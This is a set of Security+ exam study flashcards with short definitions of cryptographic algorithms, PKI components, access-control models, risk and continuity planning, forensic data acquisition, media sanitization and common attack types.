unintended error messages. application details and versions displayed to the user. kernel and memory dumps (crashes)

Wiping (2)

unrecoverable removal of data on a storage device. Usually overwrites the data storage locations multiple times with 1s and 0s.

Provisioning when deploying Network security (3)

update secure VLAN config, add firewall rules, update VPN access

Site-to-Site VPNs

use VPN concentrators or firewalls to encrypt communication across the internet.

symmetric algorithm

use a single shared key for both encryption and decryption.

Best Validation Point to use

use both server-side and client-side.

Biometrics (2)

use face or fingerprint as authentication. some apps require this authentication

ECC advantages

uses fewer CPU cycles on mobile devices and less battery.

Secure Wireless Topology Authentication (3)

use normal login credentials with 802.1X standard. integrated with existing name services. No shared passwords

Group policy Administrative control (4 eg)

use of group policy to limit what people can do in an OS: remove Add or Remove Programs. prohibit changing sounds. Allow font downloads. Only allow approved domains to use ActiveX without prompt

Take hashes (for forensics) (3)

use on digital info and again later to confirm the values match. MD5: 128-bit hash, chance of duplication is 1 in 2^128. CRC: 32-bit hash

Shredding/pulverizing (2)

use physical machinery to destroy media. can be done with a drill or hammer.

DER uses (2)

used across many platforms. Often used with Java certificates.

AUP security (2)

used by an organization to limit legal liability. should be well documented to give good reason as to why someone is dismissed.

Mail gateways (4)

used by organisations to filter unsolicited mail inbound and outbound, on-site or cloud-based. blocks phishing attempts. anti-virus. DLP

OCSP (2)

used by the browser to check the certificate revocation. sent via HTTP.

Diffie-Hellman uses (3)

used for Perfect Forward Secrecy. Ephemeral Diffie-Hellman (EDH or DHE). Combine with ECC for ECDHE.

data retention security

used for version control. recover from virus infections that are not identified immediately.

Hot and cold aisles (2)

used in most data centers to cool systems. Hard or soft walls separate them.

HMAC uses (2)

used in network encryption protocols: IPsec. TLS

HSM Environments (3)

used in very large environments with lots of web servers and keys to secure, store and back up. often found clustered together and with redundant power supplies. also used to offload CPU overhead from other devices

Non-persistence: Snapshots

used to capture a point in time of particular configuration, application instance, or data.

Non-persistence

used to describe application instances that can be built up and torn down in a matter of moments.

Use of third-party libraries and SDKs

used to extend the functionality of a programming language

Crypto modules (2 def)

used via an API when developing applications to generate ciphertext. a set of hardware, software, and/or firmware that implements cryptographic functions

Version control security

useful for seeing how and when files were modified.

advantage of wiping

useful when you need to reuse or continue using the media.

(Account management) location-based policies (2 eg)

user access can be based on location, e.g. restrict application use to only when near the office, or block IP addresses from other countries.

Corporate-owned deployment model

user device that the company owns and controls and that is not for personal use

Infrastructure as a Service Security

user is responsible for the installation, management and security of the data

IEEE 802.1x: supplicant

user workstation

(Account management) Standard naming convention (6)

usernames shouldn't conflict. the same username should be used across multiple systems. naming should be consistent across all users. names should not describe role or status, as these change. persistent for the duration of employment. memorable but not recognizable.

Secure POP/IMAP

uses STARTTLS extension to encrypt with SSL

resources to allow full device encryption

uses a lot of CPU cycles

Software as a service

"on-demand software" where the application and data are in the cloud and no development or maintenance is necessary on the user's end.

netcat (5)

"read" and "write" to the network without using the normal clients. listen on a port number. transfer data. scan ports and send data to a port. can run as a shell (backdoor) on a remote device by making it listen on a port. (alternatives: Ncat.)

SYNful Knock

(Discovered in Sept 2015) malicious firmware that infected hundreds of Cisco routers, allowing backdoor access.

What access do user accounts not have?

(accounts that have) no privileged access to the OS

Agreement types

- BPA - SLA - ISA - MOU/MOA

Threat assessment (4)

- Environmental - Manmade - Internal vs. external

SHA256 hash bits and characters

256 bits. 64 hexadecimal characters

Risk Acceptance

A business decision to take a risk

Corrective (control)

A control that mitigates damage of an attack.

Microsoft CryptoAPI

Application developers write to this to bridge the application and the Crypto service provider (CSP).

Ways to Application Whitelist (4)

Application hash. Certificate. Path. Network zone

application-based firewall (aka 4)

Application layer gateway. Stateful multilayer inspection. Deep packet inspection. Next-generation firewall

MS-CHAP

Authentication protocol used on Microsoft's PPTP

Reasons to DoS (2)

Competitive advantage. Smokescreen for some other exploit e.g. DNS spoofing attack

Documented incident types/category definitions (2)

Computer Security Incident Handling Guide available from NIST. can make your own that makes sense for the organization.

WORM example

DVD-R

Problem with SHA-1

Hash collisions: many collision attacks identified

HTTPS

Implements SSL/TLS

ITIL formerly called

Information Technology Infrastructure Library

LDAPS stands for?

LDAP Secure.

netcat alternative

Ncat

ways to research which services can be disabled (2)

Online, manufacturer's website. Trial and error.

X.500 Attribute O

Organization. The name of the organization

Discretionary Access Control (DAC)

Owner of files decides who gains access to files.

FTPS

Provides file transfers over SSL

OAuth was created by

Twitter, Google and others

Brute force attack

Use every combination of letters, characters and numbers to determine a password

Improper input handling (2, 3 eg)

When a programmer doesn't validate all of the data passed into an application, a hacker can inject malicious data and cause SQL injection, buffer overflows, DoS, etc. Takes work to find input that's malicious

DHCP Starvation Attack (2)

When a spoofed MAC address is constantly requesting DHCP addresses from a DHCP server. This will quickly cause the server to run out of IP addresses.

System sprawl/undocumented assets (2)

When an organization adds more servers or systems to the network without properly documenting their maintenance requirements. These systems can be forgotten and end up becoming vulnerabilities or pivot points.

Memory Leak

When memory is allocated and never released after it's finished being used. It grows and eventually uses all available memory, causing an application or system crash

URL hijacking

When traffic going to a site is hijacked for malicious use.

PKCS #7 uses (3)

Wide platform support: Windows, Java, Tomcat

Software packages to build Private CA (#?)

Windows Certificate Services, OpenCA

removable media control

Windows Event Log can log files copied/removed to portable media.

preventive (controls)

a control that keeps people away from your systems.

Federation

allows authentication using a third-party account.

COBIT created by

created by ISACA

Something you are advantages

difficult to change

E-vaulting

electronically back up data to an outside storage facility

Tabletop exercise

gather the key players and talk through a simulated disaster.

not-intrusive scan (eg)

gathering info without trying to exploit vulnerabilities. e.g. packet capture

Type II hypervisor

hypervisor that runs on top of an existing host OS, i.e. Windows, Linux, Mac OS X, etc.

Salt advantages (2)

identical passwords have different hashes. if the password database is breached, no passwords can be correlated

Risk register (2)

identify, document and find solutions to risks associated with each step of a project. Monitor the results. a record of information about identified risks (ISO definition)

Capturing IV example

i.e. Airodump can be used to capture packets.

VM escape protection concerns (i.e)

if allowed to break out of the VM, the user can have control of the host and other guest VMs, i.e. full control of that virtual world.

password expiration benefit to security

if credentials are made available to someone else, constant change would limit the scope of their access.

code reuse security issues

if the original code has vulnerabilities, copied code spreads them.

ECB concerns (2)

if the plaintext is the same, the ciphertext will be the same. i.e. No randomization

(Account management) Group-based access control security and concerns

implicit permissions from multiple groups can conflict with one another. Make sure users have the correct access for their job role.

Mandatory vacations security

important in high-security environments to rotate others through the job and potentially locate fraud.

Insider threats security

important to assign just the right amount of rights and permissions for their job

Difference between hash and encrypted data

impossible to recover the original message from a hash.

Permission issues (2)

improper protection that leaves a door wide open. a simple oversight but a huge vulnerability

Alternate business practices (2)

in case normal practices are disrupted during disasters, have backup practices. These must be documented and tested before a problem occurs.

Where is Wifi Direct commonly found?

in home devices

How would someone try to tap copper?

inductive tap

Fighting Rainbow tables

salt hashes

fighting replay attacks/pass the hash

salt or encryption

(OCSP) stapling advantage

scales well.

degaussing

sends a magnetic field through a device to destroy data and electronics.

Active (security) tools (3 eg)

sends traffic to a device and watches the results: query a login page. try a known vulnerability. check account access

cookies (3)

small pieces of information stored on the computer by the browser, used for tracking, personalization and session management. These are non-executable. Not generally a security risk.

windows traceroute

tracert

Mobile OS

type of OS designed for touch screen phones and tablets.

SHA-2

up to a 512-bit digest.

3DES

uses 3 different keys to encrypt, then decrypt, then encrypt again.

DES

64-bit block cipher. uses a 56-bit key.

Quantitative risk assessment

usually calculated with ALE

Automated Courses of Action example

when a storage drive begins to get full, the system can automatically clear out some space.

PPP authentications

• CHAP • PAP • MSCHAP

fuzzing aka

(aka) dynamic analysis

deterrent examples (2)

(control examples) warning signs, login banner

Rule Based Access Control (RBAC) examples (3)

(examples) often used in firewalls. Lab network access only available between 9 AM and 5 PM. Only Chrome browsers can fill out a web form.

Crypto service provider

(mostly Windows) software library that provides cryptography for applications (mostly development).

Access violations (2)

(segmentation fault) an error that occurs when a program tries to access restricted areas of memory. the OS prevents this and usually crashes the program

Wildcard domain example

*.example.com, where the * can be www, www1, ftp, a web server, etc.

Symmetric algorithms examples (6)

- AES - DES - 3DES - RC4 - Blowfish/Twofish

Risk response techniques (4)

- Accept - Transfer - Avoid - Mitigate

Key stretching algorithms (2)

- BCRYPT - PBKDF2

Data destruction and media sanitization (7)

- Burning - Shredding - Pulping - Pulverizing - Degaussing - Purging - Wiping

PKI Components (9)

- CA - Intermediate CA - CRL - OCSP - CSR - Certificate - Public key - Private key - Object identifiers (OID)

Cipher modes (5)

- CBC - GCM - ECB - CTR - Stream vs. block

Data acquisition (for forensics) (7)

- Capture system image - Network traffic and logs - Capture video - Record time offset - Take hashes - Screenshots - Witness interviews

Data sensitivity labeling and handling (6)

- Confidential - Private - Public - Proprietary - PII - PHI

Certificate formats (6)

- DER - PEM - PFX - CER - P12 - P7B

Roles that need Role-based awareness training (6)

- Data owner - Systems administrator - System owner - User - Privileged user - Executive user

Backup concepts

- Differential - Incremental - Snapshots - Full

Incident response plan (5)

- Documented incident types/category definitions - Roles and responsibilities - Reporting requirements/escalation - Cyber-incident response teams - Exercise

Wireless Authentication protocols (7)

- EAP - PEAP - EAP-FAST - EAP-TLS - EAP-TTLS - IEEE 802.1x - RADIUS Federation

Continuity of operations planning

- Exercises/tabletop - After-action reports - Failover - Alternate processing sites - Alternate business practices

Biometric factors (8 including "rates")

- Fingerprint scanner - Retinal scanner - Iris scanner - Voice recognition - Facial recognition - False acceptance rate - False rejection rate - Crossover error rate

Recovery sites

- Hot site - Warm site - Cold site

Impact examples (5)

- Life - Property - Safety - Finance - Reputation

